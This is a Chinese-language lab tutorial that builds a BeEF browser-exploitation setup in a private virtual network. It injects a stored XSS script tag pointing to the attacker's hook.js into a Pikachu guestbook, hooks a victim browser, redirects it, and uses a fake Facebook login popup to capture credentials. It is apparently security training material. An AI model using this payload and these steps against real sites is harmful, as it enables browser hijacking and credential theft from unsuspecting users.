6.1 问题

1. Kali虚拟机（192.168.111.132）搭建BeEF服务
2. 宿主机（192.168.111.1）搭建正常网站
3. Win2008虚拟机（192.168.111.133）模拟用户被攻击

6.2 步骤

实现此案例需要按照如下步骤进行。

1）Kali虚拟机安装BeEF，依次运行命令apt-get update，apt-get install beef-xss，安装完成后启动beef-xss，用户名beef，自定义密码例如123456，如图-11和图-12所示

图-11

图-12

2）Pikachu留言板输入<script src="http://192.168.111.132:3000/hook.js"></script>并提交，如图-13所示

图-13

3）当Win2008访问此网站时，恶意代码生效，kali中显示的zombie（僵尸）即受害的浏览器，每隔一段时间（默认为1秒）就会向BeEF服务器发送请求，询问是否有新的代码需要执行，如图-14所示

图-14

在线的主机：现在该主机浏览器执行了JS脚本代码

不在线的主机：该主机曾经执行过JS脚本代码

Details：浏览器信息详情

Logs：能记录你在浏览器上的操作

Commands：你能对该浏览器进行哪些操作

4）点击“Commands”，找到“Redirect Browser”，在右边的输入框中输入想跳转的网站，例如http://bj.ne.tedu.cn，点击“Execute”，如图-15所示

图-15

其中的颜色代表的含义如下。

绿色：命令模块可以在目标浏览器上运行，且用户不会感到任何异常

橙色：命令模块可以在目标浏览器上运行，但是用户可能会感到异常（例如弹窗、提示、跳转等）

灰色：命令模块尚未针对此目标进行验证，不知道是否可运行

红色：命令模块不适用于此目标

5）Win2008的浏览器已经访问了http://bj.ne.tedu.cn，劫持浏览器成功，如图-16所示

图-16

6）找到“Pretty Theft”，在右边选择“Facebook”，点击“Execute”，如图-17所示

图-17

7）Win2008出现弹窗，如图-18所示

图-18

8）用户输入后账号和密码（ntd@tedu.cn/123456）后，点击“command 1”，已经获得了账号和密码，如图-19所示

图-20